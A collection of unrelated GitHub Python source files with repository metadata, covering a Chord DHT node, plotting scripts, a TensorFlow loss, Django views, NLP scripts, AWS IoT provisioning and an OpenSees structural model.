Error = {}\".format(e))\n            return \"Query failed!\"\n\n    def print_finger_table(self):\n        for entry in self.finger_table:\n            if entry is None:\n                continue\n            print(\"entry.start = {} \\t entry.stop = {} \\t entry.successor = {} \\t \"\n                  .format(entry.start, entry.interval.stop,\n                          entry.successor))\n\n    def print_node_info(self):\n        print('[{}] Node {} is listening on port {}'.format(datetime.now().strftime(\"%I:%M:%S.%f\"), self.node,\n                                                            self.port_number))\n        print('\\tsuccessor = {}\\t\\tpredecessor = {}'.format(self.successor['number'], self.predecessor['number']))\n\n    def print_keys_dictionary(self):\n        print(\"-------------- Keys in node {} --------------\".format(self.node))\n        for key, value in self.keys.items():\n            player_id = value[0]\n            year = value[3]\n            data_id = sha1_hash(str(player_id) + str(year))\n            bucket_id = data_id % 2 ** M\n            print('\\t\\t', bucket_id, ' : ', value[0])\n\n\nif __name__ == '__main__':\n    args = sys.argv[1:]\n    node_port = int(args[0])\n    ChordNode(node_port)\n","repo_name":"lmirzaei/distributed-systems-projects","sub_path":"Lab4_DHT/chord_node.py","file_name":"chord_node.py","file_ext":"py","file_size_in_byte":22869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"27131557112","text":"#!/usr/bin/env python3\n\n# powerful runtime error reporting mechanism\n# the last line shows the error itself; the whole chain above it is the traceback\nimport sys\n# we can import sys for extra info about the error using sys.exc_info()\ndef main():\n    try:\n        x = int('foo')\n    except ValueError:\n        print(f'I caught a value error: {sys.exc_info()}')\n    except ZeroDivisionError:\n        print('dont divide by zero')\n    except:\n        print('Unknown error')\n    # so we can capture the error and execution will continue without a problem\n    print('Hello, World.')\n\nif __name__ == '__main__': main()","repo_name":"rudyredhat/PyEssTrainingLL","sub_path":"Ch07/07_01/exception-one.py","file_name":"exception-one.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"18669201864","text":"import sys\nimport xarray as xr\nimport dask\nimport dask.array as da\nimport netCDF4\nimport numpy as np\nfrom importlib import reload\nimport matplotlib as mpl\nfrom matplotlib import cm\nimport matplotlib.colors as colors\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nfrom mpl_toolkits.basemap import Basemap\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom matplotlib.colors import LinearSegmentedColormap\nimport pandas as pd\nimport regionmask\nimport cartopy.crs as ccrs\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# PATHS\nSM_PATH = '../XAI/data/'\nFIGS_PATH = './figs/'\n\n# IPCC Regions\nregions = ['NWN', 'NEN', 'WNA', 'CNA', 'ENA', 'NCA']\nregionsToRemove = ['SCA', 'CAR']\n\n# Models\nmodels = ['CNN10', 'CNN10_stand',\n          'CNNPan', 'CNN_UNET']\n\nnamesPlot = {'CNN10': 'DeepESD',\n             'CNN10_stand': 'DeepESD-Stand',\n             'CNNPan': 'CNN-PAN',\n             'CNN_UNET': 'CNN-UNET'}\n\n# Neurons\nidxNeuron = ['2000', '5950']\n\n# Vars to plot\nvarsToPlot = ['ta@1000', 'hus@1000']\n\n# Vars and heights dicts\nallVars = ['z@500', 'z@700', 'z@850', 'z@1000',\n           'hus@500', 'hus@700', 'hus@850', 'hus@1000',\n           'ta@500', 'ta@700', 'ta@850', 'ta@1000',\n           'ua@500', 'ua@700', 'ua@850', 'ua@1000',\n           'va@500', 'va@700', 'va@850', 'va@1000']\n\n# Initialize figure\nnRows = len(models)\n\nfig = plt.figure(figsize = (30, 20))\nouter = gridspec.GridSpec(nRows, 1,\n                          
wspace = -0.9, hspace = -0.1)\n\nimportanceMin = 0.1\nimportanceMax = 0.7\ncolorSchema = 'magma_r'\ncmap = plt.get_cmap(colorSchema)\ncmap.set_under('white')\n\n# IPCC Regions\nar6 = regionmask.defined_regions.ar6.all\nnorthAmerica = ar6[regions]\n\n# Dict defining coords to print region mean values\ndictCoord = {'NWN': [0.4, 0.85],\n 'NEN': [0.8, 0.85],\n 'WNA': [0.45, 0.55],\n 'CNA': [0.65, 0.55],\n 'ENA': [0.8, 0.5],\n 'NCA': [0.57, 0.25],\n 'SCA': [0.69, 0.1],\n 'CAR': [0.89, 0.1]}\n\n# Iterate over subplots\ngeneralRow = 0\nfor model in models:\n\n # Initialize inner plot\n inner = gridspec.GridSpecFromSubplotSpec(1, len(varsToPlot) * len(idxNeuron),\n subplot_spec = outer[generalRow],\n wspace = 0.1, hspace = 0.1)\n\n # Plot Saliency Maps\n innerCol = 0\n\n for var in varsToPlot:\n for neuron in idxNeuron:\n\n # Load Saliency Map\n nameSM = 'SMtrainSet_' + model + '_neuron' + str(neuron) + '.npy'\n saliencyMaps = np.load(SM_PATH + nameSM)\n\n # Compute mean of saliency maps\n saliencyMaps = np.mean(saliencyMaps, axis=0)\n\n # Idx of variable\n combIdx = allVars.index(var)\n\n # Inner\n axes = plt.Subplot(fig, inner[0, innerCol])\n\n if innerCol == 0:\n axes.set_ylabel(namesPlot[model], fontsize = 16, weight = 'bold')\n\n # Compute subplot\n map = Basemap(ax = axes,\n llcrnrlon = -164.75, llcrnrlat = 11.75,\n urcrnrlon = -59.75, urcrnrlat = 69.75,\n resolution = 'c')\n\n im = map.imshow(saliencyMaps[:, :, combIdx],\n vmin = importanceMin, vmax = importanceMax,\n cmap = cmap)\n\n map.drawcoastlines(linewidth = 0.2, color = 'gray')\n\n fig.add_subplot(axes)\n\n innerCol = innerCol + 1\n\n # Saliency maps colorbar\n cbar_ax = fig.add_axes([0.36, 0.08, 0.3, 0.012])\n cb = fig.colorbar(im, cax = cbar_ax, orientation = 'horizontal',\n extend = 'min')\n cb.ax.xaxis.set_ticks_position('top')\n cb.ax.tick_params(labelsize = 24)\n cb.set_label(label = 'Relevance (unitless)', fontsize = 26)\n\n generalRow = generalRow + 1\n\n# Cols title\nfig.text(0.255-0.055, 0.9, 'Air temperature (1000 hPa)',\n fontsize = 36)\nfig.text(0.175, 0.86, 'North Point',\n fontsize = 28)\nfig.text(0.375, 0.86, 'South Point',\n fontsize = 28)\n\nfig.text(0.65-0.065, 0.9, 'Specific Humidity (1000 hPa)',\n fontsize = 36)\nfig.text(0.57, 0.86, 'North Point',\n fontsize = 28)\nfig.text(0.77, 0.86, 'South Point',\n fontsize = 28)\n\nplt.savefig(FIGS_PATH + 'figSM_train.pdf',\n dpi = 300, bbox_inches = 'tight')","repo_name":"jgonzalezab/XAI-Statistical-Downscaling","sub_path":"figures/figSMs.py","file_name":"figSMs.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3835403813","text":"import tensorflow as tf\n\n\ndef pairwise_ranking_crossentropy_loss(y_true, y_pred):\n \"\"\"\n :@param y_true: [batch = target_betweenness | src_ids | tgt_ids]\n :@param y_pred: [batch = pred_betweenness]\n The original DrBC implementation uses 5*N src_id,tgt_id pairs from a graph of N nodes\n \"\"\"\n pred_betweenness = y_pred\n target_betweenness = tf.slice(y_true, begin=(0, 0), size=(-1, 1))\n src_ids = tf.cast(tf.reshape(tf.slice(y_true, begin=(0, 1), size=(-1, 5)), (-1,)), 'int32')\n tgt_ids = tf.cast(tf.reshape(tf.slice(y_true, begin=(0, 6), size=(-1, 5)), (-1,)), 'int32')\n\n labels = tf.nn.embedding_lookup(target_betweenness, src_ids) - tf.nn.embedding_lookup(target_betweenness, tgt_ids)\n preds = tf.nn.embedding_lookup(pred_betweenness, src_ids) - tf.nn.embedding_lookup(pred_betweenness, tgt_ids)\n return 
tf.nn.sigmoid_cross_entropy_with_logits(logits=preds, labels=tf.sigmoid(labels))\n","repo_name":"MartinXPN/DrBC","sub_path":"drbc/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8373775631","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nfrom prewikka import registrar, usergroup\n\n\nclass CLIManager(object):\n def __init__(self):\n self._commands = {}\n\n def _register(self, command, category, method, permissions, help, **options):\n d = self._commands.setdefault(command, {})\n if category not in d:\n # Avoid replacing methods by the ones from children classes\n d[category] = (method, permissions, help, options)\n\n def register(self, command, category, method=None, permissions=[], help=None, **options):\n usergroup.ALL_PERMISSIONS.declare(permissions)\n\n if method:\n self._register(command, category, method, permissions, help, **options)\n else:\n return registrar.DelayedRegistrar.make_decorator(\"cli\", self._register, command, category, permissions=permissions, help=help, **options)\n\n def unregister(self, command=None, category=None):\n if command and category:\n self._commands[command].pop(category)\n elif command:\n self._commands.pop(command)\n else:\n self._commands = {}\n\n def get(self, command):\n return self._commands.get(command, {})\n\n\ncli = CLIManager()\nget = cli.get\nregister = cli.register\nunregister = cli.unregister\n","repo_name":"Prelude-SIEM/prewikka","sub_path":"prewikka/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"36355193284","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the closestNumbers function below.\ndef closestNumbers(arr):\n arr.sort()\n diff=[]\n for i in range(1, len(arr)):\n diff.append(arr[i]-arr[i-1])\n p= diff.index(min(diff))\n pl=[]\n pl.append(p)\n arr1=[]\n\n for j in range(len(diff)):\n if j!=p:\n if diff[j]==diff[p]:\n pl.append(j)\n for x in pl:\n arr1.append(arr[x])\n arr1.append(arr[x+1])\n return arr1\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n arr = list(map(int, input().rstrip().split()))\n\n result = closestNumbers(arr)\n\n fptr.write(' '.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n","repo_name":"shkhrkat/HackerRank-solutions","sub_path":"Closest_Numbers.py","file_name":"Closest_Numbers.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6888570049","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n\nnp.random.seed(1)\nfig = plt.figure(figsize=(4, 4), facecolor='white')\nax = fig.add_axes([0,0,1,1], frameon=False)\n\n# Generate random data\ndata = np.random.uniform(0, 1, (64, 100))\nX = np.linspace(-1, 1, data.shape[-1])\nG = 1.5 * np.exp(-4 * X ** 2)\n\n# Generate line plots\nlines = []\nfor i in range(len(data)):\n # Small reduction of the X extents to get a cheap perspective effect\n xscale = 1 - i / 200.\n # Same for linewidth (thicker strokes on bottom)\n lw = 1. 
- i / 100.0\n    line, = ax.plot(xscale * X, i + G * data[i], color=\"black\", lw=lw)\n    lines.append(line)\n\n# Set y limit (to avoid cropping because of thickness)\nax.set_ylim(-2, 65)\nax.set_xticks([])\nax.set_yticks([])\n\ndef update(*args):\n    # Shift all data to the right\n    data[:, 1:] = data[:, :-1]\n\n    # Fill-in new values\n    data[:, 0] = np.random.uniform(0, 1, len(data))\n\n    # Update data\n    for i in range(len(data)):\n        lines[i].set_ydata(i + G * data[i])\n\n    # Return modified artists\n    return lines\n\nanim = animation.FuncAnimation(fig, update, frames=100, interval=20)\nanim.save('unknown-pleasures.gif', writer='imagemagick', fps=60)\nplt.show()\n","repo_name":"rougier/unknown-pleasures","sub_path":"unknown-pleasures.py","file_name":"unknown-pleasures.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"72"} +{"seq_id":"72695735914","text":"from django.contrib import messages\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.views import generic\nfrom django.db.utils import IntegrityError\nfrom marketing.models import Interaksi\nfrom marketing.forms import InteraksiForm\n\n\nclass InteraksiListView(generic.ListView):\n    queryset = Interaksi.objects.all().order_by(\"-created_at\")\n    template_name = \"marketing/interaksi_list.html\"\n\n\n@staff_member_required(login_url=\"accounts:login\")\ndef createInteraksi(request):\n    if request.method == \"POST\":\n        if request.POST[\"no_hp\"]:\n            # format no hp to 62xxx (each prefix branch below does the actual rewrite;\n            # a stray no-op normalization expression was removed here)\n            request.POST._mutable = True\n            if request.POST[\"no_hp\"].startswith(\"0\"):\n                request.POST[\"no_hp\"] = \"62\" + request.POST[\"no_hp\"][1:].replace(\n                    \" \", \"\"\n                ).replace(\"-\", \"\")\n            elif request.POST[\"no_hp\"].startswith(\"+\"):\n                request.POST[\"no_hp\"] = (\n                    request.POST[\"no_hp\"][1:].replace(\" \", \"\").replace(\"-\", \"\")\n                )\n            elif request.POST[\"no_hp\"].startswith(\"6\"):\n                request.POST[\"no_hp\"] = (\n                    request.POST[\"no_hp\"].replace(\" \", \"\").replace(\"-\", \"\")\n                )\n\n        form = InteraksiForm(request.POST)\n        if form.is_valid():\n            interaksi = form.save(commit=False)\n            interaksi.tim_marketing = request.user\n            try:\n                interaksi.save()\n            except IntegrityError:\n                messages.error(request, \"Data sudah ada pada hari ini\")\n                return redirect(\"marketing:list_interaksi\")\n\n            messages.success(request, \"Interaksi berhasil ditambahkan\")\n            return redirect(\"marketing:list_interaksi\")\n    else:\n        form = InteraksiForm()\n\n    return render(\n        request,\n        \"marketing/add_interaksi.html\",\n        {\"form\": form, \"title\": \"Add Interaksi\"},\n    )\n\n\n@staff_member_required(login_url=\"accounts:login\")\ndef editInteraksi(request, pk):\n    interaksi = get_object_or_404(Interaksi, pk=pk)\n    if request.method == \"POST\":\n        form = InteraksiForm(request.POST, instance=interaksi)\n        if form.is_valid():\n            form.save()\n            messages.success(request, \"Pendaftaran berhasil di edit!\")\n            return redirect(\"marketing:list_interaksi\")\n    else:\n        form = InteraksiForm(instance=interaksi)\n\n    context = {\"form\": form, \"title\": \"Update Interaksi\"}\n    return render(request, \"marketing/add_interaksi.html\", context)\n\n\n@staff_member_required(login_url=\"accounts:login\")\ndef delete_interaksi(request, pk):\n    interaksi = get_object_or_404(Interaksi, pk=pk)\n    interaksi.delete()\n    messages.success(request, \"Interaksi berhasil di hapus\")\n    
return redirect(\"marketing:list_interaksi\")\n\n\n@staff_member_required(login_url=\"accounts:login\")\ndef interaksi_bulanan(request):\n return render(request, \"marketing/interaksi_graph.html\")\n","repo_name":"ArRosid/idn-dashboard","sub_path":"marketing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6972998387","text":"import nltk\nimport langid\nimport numpy as np\nfrom prepare import removeStop\nfrom prepare import removeNer\nfrom sentiClassify import sentiment\n\n\npath = r'data/stopwords.txt'\n\n# 对一篇文章中的每段进行相关的情感分析之后进行\ncount = int(1)\nres_pos = []\nres_neg = []\nres_neu = []\nfor i in nlp_data:\n print(count)\n str1 = flatten_str(i)\n tokens = nltk.word_tokenize(str1)\n rm = removeStop(tokens, path)\n rm_s = rm.remove_stoplist()\n\n test = removeNer(rm_s)\n input_sent = test.remove_ner()\n res_sent = sentiment(input_sent)\n res_pos.append(res_sent['pos'])\n res_neg.append(res_sent['neg'])\n res_neu.append(res_sent['neu'])\n count += 1\n\n\n\n# ---nltk中进行的人名,地点提取\nres_person = []\nres_location =[]\nfor i in nlp_data:\n str1 = flatten_str(i)\n tokens = nltk.word_tokenize(str1)\n rm = removeStop(tokens, path)\n rm_s = rm.remove_stoplist()\n\n aaa = removeNer(rm_s)\n person = aaa.get_person()\n location = aaa.get_loaction()\n res_person.append(person)\n res_location.append(location)\n\nfrom collections import Counter\n# 去除重复值进行\ndef most_list(res_person):\n a =Counter(res_person)\n temp =a.most_common(3)\n person3 =[i[0] for i in temp]\n return person3\n\nres_person1 = [most_list(i) for i in res_person]\nres_location1 = [most_list(i) for i in res_location]\n\nres_person1 = [\",\".join(list(set(i))) for i in res_person1]\nres_location1 = [\",\".join(list(set(i))) for i in res_location1]\n\n\n\n# ---进行后面的鬼鬼,数据合并\n\ndef na_replace(list_np):\n rd2 = [round(i*100,2) for i in list_np]\n temp = np.array(rd2)\n index_nan = np.isnan(temp)\n index_inf = np.isinf(temp)\n temp[index_nan] = float(0)\n temp[index_inf] = float(0)\n out_list = [i.item() for i in temp]\n return out_list\n\nres_pos1 = na_replace(res_pos)\nres_neu1 = na_replace(res_neu)\nres_neg1 = na_replace(res_neg)\n\ntt = zip(res_pos1, res_neu1, res_neg1, top5, res_person1, res_location1, sim_where, article)\nto_sql = list(tt)\n\n\n\n","repo_name":"goal1234/nlp","sub_path":"lie/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28712217152","text":"import os\nimport json\n\n\nclass Jit(object):\n def __init__(self, event, context, iot):\n self.event = event\n self.context = context\n self.iot = iot\n\n def _certificate_arn(self):\n aws_region = os.getenv('AWS_REGION')\n aws_account_id = self.event.get('awsAccountId')\n certificate_id = self.event.get('certificateId')\n\n return f'arn:aws:iot:{aws_region}:{aws_account_id}:cert/{certificate_id}'\n\n def _iot_policy(self):\n return json.dumps({\n 'Version': '2012-10-17',\n 'Statement': [\n {\n 'Effect': 'Allow',\n 'Action': [\n 'iot:Publish',\n 'iot:Receive',\n 'iot:Subscribe',\n 'iot:Connect'\n ],\n 'Resource': '*'\n }\n ]\n })\n\n def _iot_policy_name(self):\n return f'{self.event.get(\"certificateId\")}-policy'\n\n def _create_iot_policy(self):\n return self.iot.create_policy(policyName=self._iot_policy_name(),\n policyDocument=self._iot_policy())\n\n def _does_iot_policy_exist(self):\n policies = 
self.iot.list_policies().get('policies')  # NOTE: list_policies paginates; only the first page is checked here\n\n        for policy in policies:\n            if policy.get('policyName') == self._iot_policy_name():\n                return True\n        return False\n\n    def _update_iot_certificate(self):\n        self.iot.update_certificate(certificateId=self.event.get('certificateId'),\n                                    newStatus='ACTIVE')\n\n    def _attach_iot_policy(self):\n        self.iot.attach_policy(policyName=self._iot_policy_name(),\n                               target=self._certificate_arn())\n\n    def main(self):\n        try:\n            if not self._does_iot_policy_exist():\n                self._create_iot_policy()\n                self._attach_iot_policy()\n            self._update_iot_certificate()\n        except Exception as e:\n            print(e)\n","repo_name":"knakayama/aws-iot-playground","sub_path":"jit/src/handlers/jit/jit.py","file_name":"jit.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30201635280","text":"# -*-coding:utf-8-*-\nimport jieba.analyse\nimport numpy as np\nfrom flask import Flask, request, jsonify\nimport ast\nimport pymysql\nimport jieba\n\napp = Flask(__name__)\njieba.initialize()  # initialize jieba eagerly instead of on first use\njieba.load_userdict(\"./vocab.txt\")\njieba.enable_parallel(4)\nwith open('../data_helper/stopwords.txt', 'r') as f:\n    stopwords = [word.replace('\\n', '') for word in f.readlines()]\n\n\ndef inspection_spec_relation_DB(inspection_name):\n    db = pymysql.connect(host=\"172.30.2.231\", user=\"zhangziang\",\n                         password=\"Dzjzza*2022\", database=\"hrs\", port=3306, autocommit=False)\n    sql = f\"select * from inspection_spec_relation where name = '{inspection_name}'\"\n    cursor = db.cursor()\n    row_count = cursor.execute(sql)\n\n    return cursor\n\n\ndef sim(keywords1, keywords2):\n    # jaccard\n    intersection = len(list(set(keywords1).intersection(set(keywords2))))\n    sample_len = min(len(keywords1), len(keywords2))\n    # union = len(list(set(keywords_sample).union(set(keywords2_match))))\n    # guard against division by zero\n    # sim = float(intersection) / union if union != 0 else 0\n    sim = float(intersection) / sample_len if sample_len != 0 else 0\n    if sim > 0.6:\n        return True\n    else:\n        return False\n\n\ndef inspection_calculate(input_inspectionName, inspection_value, DB_data):\n    name = DB_data[1]\n    data_type = DB_data[2]\n    operator = DB_data[3]\n    min_value = float(DB_data[4]) if DB_data[4] is not None else None\n    max_value = float(DB_data[5]) if DB_data[5] is not None else None\n    unique_code = DB_data[6]\n\n    assert input_inspectionName == name\n    assert data_type == 'NUMBER'\n\n    if operator == \"EQUALS\":\n        if min_value is None:\n            return None\n        elif inspection_value == min_value:\n            return unique_code\n        else:\n            return None\n    elif operator == \"GREATER_EQUAL\":\n        if max_value is None:\n            return None\n        elif inspection_value >= max_value:\n            return unique_code\n        else:\n            return None\n    elif operator == \"LESS_EQUAL\":\n        if min_value is None:\n            return None\n        elif inspection_value <= min_value:\n            return unique_code\n        else:\n            return None\n    elif operator == \"LESS\":\n        if min_value is None:\n            return None\n        elif inspection_value < min_value:\n            return unique_code\n        else:\n            return None\n    elif operator == \"GREATER\":\n        if max_value is None:\n            return None\n        elif inspection_value > max_value:\n            return unique_code\n        else:\n            return None\n    elif operator == \"RANGE\":\n        if min_value is None or max_value is None:\n            return None\n        elif min_value < inspection_value < max_value:\n            return unique_code\n        else:\n            return None\n    else:\n        return None\n\n\n@app.route(\"/wm_semantic_sim\", methods=[\"POST\"])\ndef semantic_sim():\n    data = request.get_json()\n    result = {'unique_code': []}\n    
for input_inspectionName in data:\n        try:\n            inspection_value = float(data[input_inspectionName])\n            for DB_data in inspection_spec_relation_DB(input_inspectionName).fetchall():\n                unique_code = inspection_calculate(input_inspectionName, inspection_value, DB_data)\n                if unique_code is not None:\n                    result['unique_code'].append(unique_code)\n                else:\n                    continue\n        except Exception:\n            input_inspection_value = str(data[input_inspectionName])\n            cut_input = [word for word in jieba.cut(input_inspection_value) if word not in stopwords]\n            keyword_input = jieba.analyse.extract_tags(\"|\".join(cut_input), topK=200, withWeight=False)\n            for DB_data in inspection_spec_relation_DB(input_inspectionName).fetchall():\n                cut_DB = [word for word in jieba.cut(DB_data[4]) if word not in stopwords]\n                keyword_DB = jieba.analyse.extract_tags(\"|\".join(cut_DB), topK=200, withWeight=False)\n                if sim(keyword_input, keyword_DB) is True:\n                    result['unique_code'].append(DB_data[6])\n                else:\n                    continue\n    return jsonify(result)\n\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', threaded=True, port=5003)\n","repo_name":"274349293/MedBrain","sub_path":"text_sim/wm_sim/wm_semantic_match_API.py","file_name":"wm_semantic_match_API.py","file_ext":"py","file_size_in_byte":4336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71208641832","text":"#--------------------------------------------------------\n# LibUnits.py - Define system of units OpenSees model\n# Code: II\n#--------------------------------------------------------\n# base units (SI units)\nm = 1\nkg = 1\ns = 1\n# other units\nN = kg*m/s**2\ncm = 0.01*m\nPa = N/m**2\nksi = 6894757.2932*Pa\nkgf = 9.8066*N\nMPa = 10**6*Pa\npsi = 6894.76*Pa\n# physical constants\ng = 9.80665*m/s**2\n\n# Material properties\nfc = 210 # kg/cm2\nE = 15100*fc**0.5*10**4*9.80665*Pa\nG = 0.5*E/(1+0.2)\n# Column section\na = 60*cm\nAc = a**2\nρlc = 2400*Ac*m**2\nIzc = a**4/12\nIyc = a**4/12\nJxxc = 2.25*(a/2)**4\n# Beam section\nb = 60*cm\nh = 30*cm\nA = b*h\nρl = 2400*A*m**2\nIz = b*h**3/12\nIy = b**3*h/12\nJxx = 0.229*max(b,h)*min(b,h)**3 # TODO: revise\n#\ndef GeoModel(dx, dy, h, nx, ny, nz):\n    from numpy import zeros, ones\n    import matplotlib.pyplot as plt\n    # import matplotlib.pyplot as plt\n    Lx, Ly, Lz = dx*nx, dy*ny, h*nz\n    NN = (nx+1)*(ny+1)*(nz+1)\n    Nodes = zeros((NN,5))\n    # Create the nodes and assign coordinates\n    c = 0\n    for i in range(nz+1):\n        for j in range(ny+1):\n            for k in range(nx+1):\n                if k == nx and j != ny and j!= 0:\n                    Nodes[c] = [c,k*dx,j*dy,i*h,0.50]\n                elif k != nx and j == ny and k!= 0:\n                    Nodes[c] = [c,k*dx,j*dy,i*h,0.50]\n                elif k == 0 and j != ny and j!= 0:\n                    Nodes[c] = [c,k*dx,j*dy,i*h,0.50]\n                elif k != nx and j == 0 and k!= 0:\n                    Nodes[c] = [c,k*dx,j*dy,i*h,0.50]\n                elif k == nx and j == ny:\n                    Nodes[c] = [c,k*dx,j*dy,i*h,0.25]\n                elif k == 0 and j == 0:\n                    Nodes[c] = [c,k*dx,j*dy,i*h,0.25]\n                elif k == nx and j == 0:\n                    Nodes[c] = [c,k*dx,j*dy,i*h,0.25]\n                elif k == 0 and j == ny:\n                    Nodes[c] = [c,k*dx,j*dy,i*h,0.25]\n                else:\n                    Nodes[c] = [c,k*dx,j*dy,i*h,1.00]\n                c = c + 1\n    Nodes[:(nx+1)*(ny+1),4]=0\n    # print(Nodes)\n\n    NE = (nx*(ny+1)+ny*(nx+1)+(nx+1)*(ny+1))*nz\n    Elems = zeros((NE,4))\n    # Create the connectivity of the vertical elements (columns)\n    c = 0\n    for i in range(nz):\n        for j in range(ny+1):\n            for k in range(nx+1):\n                Elems[c] = [c,c,c+(nx+1)*(ny+1),1]\n                c = c + 1\n    # Create the connectivity of the horizontal elements (beams along X)\n    m = (nx+1)*(ny+1)\n    for i in range(nz):\n        for j in range(ny+1):\n            for k in 
range(nx):\n                Elems[c] = [c,m,m+1,2]\n                m = m + 1\n                c = c + 1\n            m = m + 1\n    # Create the connectivity of the horizontal elements (beams along Y)\n    n = 0 \n    for i in range(nz):\n        n = n + (nx+1)*(ny+1)\n        for j in range(nx+1):\n            for k in range(ny):\n                Elems[c] = [c,j+k*(nx+1)+n,j+nx+1+k*(nx+1)+n,2]\n                c = c + 1\n    # Create the diaphragm center nodes (one per storey)\n    Diap = zeros((nz,4))\n    for i in range(nz):\n        Diap[i] = [i+1000,Lx/2.0,Ly/2.0,h*(i+1)]\n    #\n    return Nodes, Elems, Diap\n\ndef espectro_E030(T,Z=0.45,U=1.5,S=1.0,Tp=0.4,Tl=2.5,R=1):\n    from numpy import zeros\n    n = len(T)\n    E030 = zeros(n)\n    for i in range(n):\n        if T[i]>=0 and T[i]<0.2*Tp:\n            E030[i]=2.5#1+7.5*T[i]/Tp\n        elif T[i]>=0.2*Tp and T[i]<Tp:\n            E030[i]=2.5\n        elif T[i]>=Tp and T[i]<Tl:\n            E030[i]=2.5*(Tp/T[i])\n        elif T[i]>=Tl:\n            E030[i] = 2.5*(Tp*Tl/T[i]**2)\n        else:\n            print(\"El periodo no puede ser negativo!\")\n    return E030*Z*U*S/R\n\ndef get_static_loads(coef,p,h,T):\n    from numpy import zeros\n    n = len(h)\n    V = coef*sum(p)\n    F = zeros(n)\n    #\n    if T > 0.0 and T <= 0.5:\n        k=1.0\n    elif T>0.5:\n        k = 0.75+0.5*T\n    else:\n        print('El periodo es negativo!')\n    #\n    div = 0.\n    for i in range(n):\n        div = div + p[i]*h[i]**k\n    #\n    for i in range(n):\n        F[i] = p[i]*h[i]**k/div*V\n    return F,k\n\ndef getCombo(E030,MF,modo,NT,Tmodes):\n    import numpy as np\n    import pandas as pd\n    # Total masses\n    Mx = sum(sum(MF[0::3,0::3]))\n    My = sum(sum(MF[1::3,1::3]))\n    Mr = sum(sum(MF[2::3,2::3]))\n\n    # Initial values\n    Ux,Uy,Rz = np.zeros(NT),np.zeros(NT),np.zeros(NT)\n    Ux[0::3]=1\n    Uy[1::3]=1\n    Rz[2::3]=1\n    SUMx, SUMy, SUMr = 0., 0., 0.\n    Nmodes = len(modo) \n\n    # Participating mass ratios\n    ni=0\n    np.set_printoptions(precision = 4)\n    df1 = pd.DataFrame(columns=['Modo','T(s)','SumUx','SumUy','SumRz'])\n    for j in range(1,Nmodes+1):\n        FPx=modo[j-1].T@MF@Ux\n        FPy=modo[j-1].T@MF@Uy\n        FPr=modo[j-1].T@MF@Rz\n        FPRx=FPx**2/Mx\n        FPRy=FPy**2/My\n        FPRr=FPr**2/Mr\n        SUMx = SUMx + FPRx\n        SUMy = SUMy + FPRy\n        SUMr = SUMr + FPRr\n        #\n        if min(SUMx,SUMy,SUMr)>0.90 and ni==0:\n            ni = j\n        df1 = df1.append({'Modo':j, 'T(s)':Tmodes[j-1],'SumUx':SUMx,\n                          'SumUy':SUMy,'SumRz':SUMr}, ignore_index=True)\n    print('N° mínimo de Modos a considerar:',ni)\n\n    # Initial values\n    D_ABSx,D_RCSCx = np.zeros(NT),np.zeros(NT)\n    Δ_ABSx,Δ_RCSCx = np.zeros(NT),np.zeros(NT)\n    V_ABSx,V_RCSCx = np.zeros(NT),np.zeros(NT)\n    D_ABSy,D_RCSCy = np.zeros(NT),np.zeros(NT)\n    Δ_ABSy,Δ_RCSCy = np.zeros(NT),np.zeros(NT)\n    V_ABSy,V_RCSCy = np.zeros(NT),np.zeros(NT)\n\n    # Modal spectral superposition\n    for j in range(1,ni+1):#ni+1\n        FPx=modo[j-1].T@MF@Ux\n        FPy=modo[j-1].T@MF@Uy\n        FPr=modo[j-1].T@MF@Rz\n        #\n        Sa = E030[j-1]\n        Sd = Sa*9.80665/(2*np.pi/Tmodes[j-1])**2\n        #\n        respDX = Sd*FPx*modo[j-1]\n        respAX = Sa*FPx*MF@modo[j-1]\n        D_ABSx = D_ABSx + abs(respDX)\n        D_RCSCx = D_RCSCx + (respDX)**2\n        respDX[3:] = respDX[3:] - respDX[:-3]\n        Δ_ABSx = Δ_ABSx + abs(respDX)\n        Δ_RCSCx = Δ_RCSCx + (respDX)**2\n        V_ABSx = V_ABSx + abs(np.cumsum(respAX[::-1])[::-1])\n        V_RCSCx = V_RCSCx + (np.cumsum(respAX[::-1])[::-1])**2\n        #\n        respDY = Sd*FPy*modo[j-1]\n        respAY = Sa*FPy*MF@modo[j-1]\n        D_ABSy = D_ABSy + abs(respDY)\n        D_RCSCy = D_RCSCy + 